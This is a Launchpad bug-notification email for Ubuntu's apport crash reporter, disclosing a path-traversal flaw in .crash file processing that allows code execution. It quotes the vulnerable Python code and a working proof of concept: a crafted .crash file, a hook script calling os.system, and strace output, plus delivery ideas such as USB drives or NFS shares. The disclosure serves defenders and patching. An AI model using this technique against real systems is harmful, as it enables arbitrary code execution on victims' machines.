[Bug 1700573] Re: Code execution through path traversal in .crash files processing

Ubuntu Foundations Team Bug Bot 1700573 at bugs.launchpad.net
Tue Jul 18 20:21:15 UTC 2017 

** Tags added: patch

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1700573

Title:
  Code execution through path traversal in .crash files processing

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Confirmed
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Yakkety:
  Fix Released
Status in apport source package in Zesty:
  Fix Released
Status in apport source package in Artful:
  Confirmed

Bug description:
  The function add_hooks_info in apport/report.py is vulnerable to a
  directory traversal when processing the ExecutablePath key of a
  malicious .crash file:

          opt_path = None
          if self.get('ExecutablePath', '').startswith(_opt_dir):
              opt_path = self.get('ExecutablePath', '')
          elif package:
              # check package contents
              try:
                  for f in apport.packaging.get_files(package):
                      if f.startswith(_opt_dir) and os.path.isfile(f):
                          opt_path = f
                          break
              except ValueError:
                  # uninstalled package
                  pass

          if opt_path:
              while len(opt_path) >= len(_opt_dir):
                  hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
                  opt_path = os.path.dirname(opt_path)

  
  This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:

  fwilhelm at box:~$ cat poc.crash 
  ProblemType: Bug
  ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
  Package: f

  fwilhelm at box:~$ cat /tmp/poc/share/apport/package-hooks/f.py 
  import os
  os.system("gnome-calculator")

  fwilhelm at bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
  [pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
  [pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0

  The sub directory requirement makes this a bit tricky to exploit
  remotely, but depending on the environment a malicious USB drive, a
  shared NFS share or a crash file inside an archive could be used.

  Please credit Felix Wilhelm from the Google Security Team in all
  releases, patches and advisories related to these issues.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions

More information about the foundations-bugs mailing list